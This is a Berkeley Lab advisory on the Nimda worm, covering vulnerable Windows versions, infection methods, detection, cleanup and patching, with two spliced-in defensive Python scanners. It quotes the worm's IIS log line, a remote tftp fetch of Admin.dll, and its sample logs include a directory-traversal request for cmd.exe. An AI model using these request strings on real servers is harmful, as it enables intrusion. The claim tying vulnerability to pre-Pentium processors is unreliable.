Computer Protection Program Berkeley Lab
Ernest Orlando Lawrence Berkeley National Laboratory

Nimda Worm Protection ABCs

Which Systems and Applications Are Vulnerable?

Microsoft Windows, some versions of Internet Explorer, and Microsoft Outlook are the high-risk systems. If you have a Microsoft Windows system (Windows 95, 98, ME, NT, or 2000) and/or use Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) on a pre-Pentium processor (X286, 386, 486) platform, your system is potentially vulnerable to a Nimda ("Admin" spelled backwards) worm infection. Actually named "W32/Nimda@MM," the Nimda worm is spreading rapidly around the Internet, causing substantial damage and disruption.

If you are using a vulnerable version of MS IE/Outlook, a Nimda-infected e-mail attachment can infect your system immediately upon opening the e-mail message. If you are using a vulnerable version of MS IE as your Web browser, a Nimda-infected Web site can infect your computer through your browser.

Note:
_______

You can determine the particular version of the Microsoft operating system that your system runs by going to Start, then Run, and entering winver.

SP is an abbreviation for Service Pack, a set of patches from Microsoft.

With Netscape e-mail, you will not become infected unless you take the additional step of opening the attachment. Do not open attachments ending in an .exe suffix.

The Netscape browser is not vulnerable to infected Web sites.

Browsers or E-mail clients running on Mac or Unix are NOT susceptible to NIMDA.

How Nimda Infects Systems (in a Nutshell)

Nimda uses a variety of methods to infect victim systems, something that makes it more troublesome than most other worms and viruses. Infection methods include:

  • Sending a malformed MIME header in Microsoft Outlook and Outlook Express to the mail reader, causing the e-mail attachment to be automatically run (thus infecting the system), then sending itself to Address Book addresses,
  • Exploiting the "directory traversal vulnerability," a bug in which a malformed URL can allow unauthorized access to system folders and files, resulting in privilege escalation, and
  • Searching for root.exe (a version of cmd.exe planted by the Code Red II worm) to tftp itself to other Web servers.

Note:
_______

tftp is the Trivial File Transfer Protocol.

  • Nimda then copies itself to a file named readme.eml in every accessible directory within an infected system. If a directory has HTML or ASP files, Nimda writes a JavaScript routine that tries to load the Nimda code on the client system when any user reads an infected page. It also copies a malicious file, readme.eml, to every shared directory, such that if a user selects that file while Web View in Windows Explorer is enabled, the HTML activates, resulting in infection of the system. As if this were not enough, it creates a Trojan version of riched20.dll in any directory that contains .doc files and causes this dll (dynamic link library) to be executed during system startup. Additionally, it tries to infect the riched20.dll file in the System32 directory as well as any exe files it locates on remote systems. It attempts to infect both the same way a normal virus would, such that the worm code is loaded prior to the regular executable code.

Once the worm has infected a system, it:

  • Enables the Guest account and adds it to the Administrators group,
  • Shares the C: drive, giving Full Control to Everyone,
  • Disables share-level permissions on every shared directory,
  • Modifies other Registry keys and system files.

For more detail concerning Nimda's infection mechanisms, visit Information on the Nimda Worm (Microsoft TechNet)

Detecting a Nimda Infection

A Nimda infection results in changes to systems, so be on the lookout for:

  • The existence of a root.exe file (which shows that the Code Red II or sadmind/IIS worms have infected the system, making it vulnerable to Nimda).
  • The presence of Admin.dll in the root directory of the c, d, and/or e drives (although the Internet Information Server, IIS, can legitimately install this file in directories, so be careful here).
  • The presence of .eml or .nws files in various directories.
  • The addition of the following string in the IIS logs: /c+tftp%20i%20<IP address>%20GET%20Admin.dll%20d:\Admin.dll 200.

Note:
_______

The "200" indicates that the command executed successfully.
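The indicators above (the tftp/Admin.dll log string, root.exe requests, stray .eml/.nws files, Admin.dll in a drive root, a riched20.dll beside .doc files, and the JavaScript routine written into HTML/ASP pages described under "How Nimda Infects Systems") can be checked mechanically. The script below is an added example, not part of the LBNL alert or any vendor tool: it scans IIS W3C log lines and a directory tree for those artifacts. The sample log lines and the temporary directory tree are constructed, the regular expressions are assumptions about the shape of the indicators, and a drive root is simulated by the top of the temporary tree.

```python
"""Host- and log-side check for the Nimda artifacts this page lists.
Added example; not part of the LBNL alert. The log lines and the
directory tree below are constructed; the regexes are assumptions."""
import os
import re
import shutil
import tempfile
from urllib.parse import unquote_plus

# The IIS log fragment the page quotes, URL-decoded: a command shell reached
# through the web server fetching Admin.dll over tftp. Nimda's request used
# "tftp -i"; the page prints it without the dash, so both forms are accepted.
TFTP_ADMIN_DLL = re.compile(r"tftp\s+-?i\s+\S+\s+GET\s+Admin\.dll", re.IGNORECASE)
# root.exe (left behind by Code Red II) or cmd.exe requested through IIS.
SHELL_STEM = re.compile(r"/(root|cmd)\.exe$", re.IGNORECASE)
# A script block that opens readme.eml: the page's "JavaScript routine" (assumed shape).
INJECTED = re.compile(rb"<script[^>]*>[^<]*readme\.eml", re.IGNORECASE)
WEB_PAGE = (".htm", ".html", ".asp")

# Constructed IIS W3C log lines (not real log data).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 10:02:13 192.0.2.7 GET /scripts/root.exe /c+tftp%20-i%20192.0.2.7%20GET%20Admin.dll%20d:\\Admin.dll 200
2001-09-18 10:02:14 192.0.2.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 10:02:15 198.51.100.3 GET /index.htm - 200
2001-09-18 10:02:16 192.0.2.9 GET /MSADC/root.exe /c+dir 200
"""


def scan_log(text):
    """One (client ip, kind, command_succeeded) tuple per suspicious request."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        c_ip, stem, query, status = parts[2], parts[4], parts[5], parts[6]
        decoded = unquote_plus(stem + " " + query)  # IIS logs "+" for a space
        if TFTP_ADMIN_DLL.search(decoded):
            kind = "tftp-admin-dll"
        elif SHELL_STEM.search(unquote_plus(stem)):
            kind = "shell-request"
        else:
            continue
        # As the page notes, a 200 means the command actually ran.
        findings.append((c_ip, kind, status == "200"))
    return findings


def scan_tree(root):
    """Walk a drive root for the file artifacts the page lists; sorted (kind, path)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        names = [f.lower() for f in files]
        has_doc = any(n.endswith(".doc") for n in names)
        in_system32 = os.path.basename(dirpath).lower() == "system32"
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            n = name.lower()
            if dirpath == root and n == "admin.dll":
                findings.append(("admin-dll-in-root", rel))
            if n.endswith((".eml", ".nws")):
                findings.append(("eml-or-nws", rel))
            # The real riched20.dll lives in System32; one beside .doc files is the Trojan.
            if n == "riched20.dll" and has_doc and not in_system32:
                findings.append(("riched20-beside-doc", rel))
            if n.endswith(WEB_PAGE):
                with open(full, "rb") as fh:
                    if INJECTED.search(fh.read()):
                        findings.append(("injected-page", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed directory tree imitating an infected drive; returns its path."""
    root = tempfile.mkdtemp(prefix="nimda-sample-")
    layout = {
        "Admin.dll": b"",
        "docs/report.doc": b"",
        "docs/riched20.dll": b"",
        "inetpub/wwwroot/about.htm": b"<html>clean page</html>",
        "inetpub/wwwroot/index.htm": b'<html>site</html>\n<script language="JavaScript">window.open("readme.eml")</script>',
        "inetpub/wwwroot/readme.eml": b"",
        "tmp/news.nws": b"",
        "winnt/system32/riched20.dll": b"",  # legitimate location, not flagged
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


def remove_sample_tree(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("log:", hit)
    sample = build_sample_tree()
    for hit in scan_tree(sample):
        print("file:", hit)
    remove_sample_tree(sample)
```

On a real host you would point scan_tree at each drive root and scan_log at the IIS log directory; a riched20.dll found in System32 is not reported here because presence alone says nothing about whether that copy has been infected, which is a question for the rebuild-or-scan decision in the cleanup section.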

LBNL's intrusion detection tool, BRO, has been discovering Nimda infections in LBNL systems. If your system has been infected and BRO has detected the infection, your system's network access will be temporarily blocked until it is clean of the infection. If you notice that you can reach LBNL addresses but not others, contact the Help Desk by dialing HELP or sending email to help@lbl.gov.

Cleaning up a Nimda Infection

Nimda is deadly. It not only can gain full control over a victim system, but it also modifies files as well as adding Trojan files to directories. The best remedy for a Nimda infection, therefore, is to reformat the hard drive of the infected system, then reinstall every software program from trusted copies. Reformatting the hard drive is a drastic measure, true, but one can never be sure of the integrity of any system that has been infected by Nimda until the system is rebuilt.

CAUTION: Do not reformat the hard drive if you have never rebuilt a system before! You may not only wipe out your system, but may lose all data. Leave your system on, attach a DO NOT USE sign on your display terminal, call the Help Desk, and wait!

Do not try to recover HTML or ASP documents from any system that Nimda has infected without first deleting all Nimda propagation code and the readme.eml file. Delete all Trojan versions of riched20.dll from all document directories. Avoid copying any executables from an infected system to a clean one.

A second but far less desirable solution is to download, then run Symantec's W32.Nimda.A@mm Removal Tool.

If you run Symantec's tool, you will also have to take additional actions, such as changing all passwords of all accounts with Administrator privileges, disabling the Guest account, removing the Guest account from the Administrators Group, and others, depending on what Nimda has done. Note also that Symantec's tool does not help prevent infections—it only helps in cleaning up infected systems.
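The follow-up actions listed above (password changes for every Administrator-level account, disabling Guest, and removing Guest from Administrators, plus the C: drive share the worm creates) can be audited from the output of the built-in net command. The script below is an added example and is not part of the LBNL alert or Symantec's tool: it parses the text of net localgroup Administrators, net user Guest, and net share and lists each finding next to the net command that undoes it. The three sample outputs are constructed, and their column layout is an assumption about what those commands print; on a Windows host the main block runs the commands instead of using the samples.

```python
"""Post-cleanup audit for the account and share changes the page attributes
to Nimda. Added example; not from the LBNL alert or Symantec's removal tool.
Sample command outputs are constructed; their layout is an assumption."""
import os
import re
import subprocess

# Constructed, shaped like `net localgroup Administrators` on an infected host.
SAMPLE_LOCALGROUP = """Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Guest
The command completed successfully.
"""

# Constructed, shaped like `net user Guest` with the account still enabled.
SAMPLE_USER_GUEST = """User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never
The command completed successfully.
"""

# Constructed, shaped like `net share`: C$ is the normal hidden admin share;
# the plain "C" share of the drive root is the kind of share the page describes.
SAMPLE_SHARES = """Share name   Resource                        Remark

-------------------------------------------------------------------------------
ADMIN$       C:\\WINNT                        Remote Admin
C$           C:\\                             Default share
IPC$                                         Remote IPC
C            C:\\
The command completed successfully.
"""

TRAILER = "The command completed successfully."
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def table_rows(output):
    """Yield the rows that follow the dashed separator in `net` output."""
    seen_rule = False
    for line in output.splitlines():
        if seen_rule:
            if not line.strip() or line.startswith(TRAILER):
                break
            yield line.rstrip()
        elif line.startswith("----"):
            seen_rule = True


def administrators(output):
    return [row.strip() for row in table_rows(output)]


def guest_enabled(output):
    m = re.search(r"^Account active\s+(Yes|No)", output, re.MULTILINE)
    return bool(m and m.group(1) == "Yes")


def shares(output):
    """(share name, resource) pairs; resource is empty for IPC$-style shares."""
    result = []
    for row in table_rows(output):
        parts = row.split()
        resource = parts[1] if len(parts) > 1 and re.match(r"^[A-Za-z]:", parts[1]) else ""
        result.append((parts[0], resource))
    return result


def audit(localgroup_output, guest_output, share_output):
    """(finding, remediation command) pairs mirroring the page's cleanup steps."""
    findings = []
    members = administrators(localgroup_output)
    if any(m.lower() == "guest" for m in members):
        findings.append(("Guest is a member of Administrators",
                         "net localgroup Administrators Guest /delete"))
    if guest_enabled(guest_output):
        findings.append(("Guest account is enabled", "net user Guest /active:no"))
    for m in members:  # the page says to change every admin-level password
        if m.lower() != "guest":
            findings.append((f"reset password for Administrators member {m}", f"net user {m} *"))
    for name, resource in shares(share_output):
        if DRIVE_ROOT.match(resource) and not name.endswith("$"):
            findings.append((f"drive root {resource} shared as {name}", f"net share {name} /delete"))
    return findings


def run_net(*args):
    return subprocess.run(["net", *args], capture_output=True, text=True).stdout


if __name__ == "__main__":
    if os.name == "nt":
        outputs = (run_net("localgroup", "Administrators"), run_net("user", "Guest"), run_net("share"))
    else:
        outputs = (SAMPLE_LOCALGROUP, SAMPLE_USER_GUEST, SAMPLE_SHARES)
    for finding, command in audit(*outputs):
        print(f"{finding}: {command}")
```

The audit only reports; the commands it prints are the standard net user, net localgroup and net share forms, and the password reset uses the interactive form (net user NAME *) so no password appears on a command line. Hidden drive-root shares such as C$ are expected on NT and 2000 and are not flagged, but the page's "Full Control to Everyone" change cannot be seen in net share's summary table, so their permissions still need to be checked by hand after an infection.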

Preventing Nimda Infections

The best countermeasure against Nimda is to prevent infections in the first place. This final part of this posting explains how to do this.

Installing SPs and Hotfixes

The best way to prevent Nimda infections is to ensure that you have installed the latest patches on your system. If you are running Windows NT, you should install not only SP6a, but also the post-SP6a hot fixes. Download from http://www.lbl.gov/download/. The same URL can be used to download SP2 for Windows 2000 as well as the post-SP2 hotfixes.

The LBNL Computer Protection Program also strongly recommends that you download and run a tool, hfnetchk, to check whether critical hotfixes have been installed. You can get hfnetchk at Microsoft TechNet/HFNETCHK.

Defending Internet Explorer (IE)

If your system runs Microsoft's Internet Explorer (IE), verify that the patch described in Microsoft Bulletin MS01-020 is installed.

Verify also that the IE patch provided in Microsoft Security Bulletin MS01-027 is installed.

Next you need to learn what version of IE your system is running. Go to your system's Windows Explorer search function, then search for "Explorer." Look for a file named "iexplore." Move the pointer to "iexplore," right click, choose Properties, then click on the Version tab at the top. The first two sets of numbers that appear to the right of the Version field in the dialog box are the version of IE.

Securing the Internet Information Server (IIS) (this applies only to Windows NT and Windows 2000 systems):

To protect against Nimda infections, you will also need to secure IIS. To check whether your system is running IIS, go from Start to Run, then enter "cmd." Now enter "net start | more". If the IIS Admin Service is listed, IIS is running. If you do not need IIS, you should disable it immediately. (See IIS Server Guidelines for instructions concerning how to do this.)

You may also want to run Microsoft's IIS Lockdown Tool in its default mode.

The Nimda.E Variant

New variants of malicious, self-reproductive programs continue to surface. One of the latest is a new version of Nimda called "Nimda.E." Spreading both via email and the web, it attempts to exploit the same vulnerabilities that the original version of Nimda targeted, particularly IIS cross-site scripting vulnerabilities (described in Microsoft Bulletin MS00-60), the IIS web server folder traversal vulnerability (described in Microsoft Bulletin MS00-078), and also a vulnerability in which an incorrect MIME header can cause IE to execute an e-mail attachment (described in Microsoft Bulletin MS01-020).

If Nimda.E comes in the form of an e-mail attachment, it is usually named "sample.eml" or "sample.exe." Once Nimda.E executes, it inserts the Trojan riched20.dll into the victim system, just as the original version of Nimda does. In contrast, however, Nimda.E also attempts to download two additional dlls, httpodbc.dll and cool.dll. The httpodbc.dll is named identically to a legitimate dll in IIS systems, but it is inserted in a different path from the one for the legitimate version of this dll. The different path renders Windows 2000's Windows File Protection ineffective in detecting any violation of system integrity. Additionally, the name "cool.dll" can be confusing because it is the name of a legitimate dll in Windows 98 systems.

Ensuring that all Service Packs and hot fixes have been installed is the best way to defend your system against Nimda, Nimda.E, and other types of malicious programs that target Windows operating systems, browsers, mail clients, and IIS servers. The latest Service Packs and hot fixes (including bundled hot fixes, which can save you a considerable amount of time, effort, and frustration) are available at http://www.lbl.gov/download/.

It is critical to check that you have updated your IE Browser to ensure you're not running one that's vulnerable to MS01-020. You should be running IE 5.01 SP2, IE 5.5 SP2, or IE 6.0 to be sure you're not vulnerable, or apply the MS01-027 patch (which supersedes MS01-020).

Prevention is the best cure for Nimda.E, but if your system is successfully attacked by this virus/worm, be sure to follow the procedures described in Cleaning Up a Nimda Infection (above).
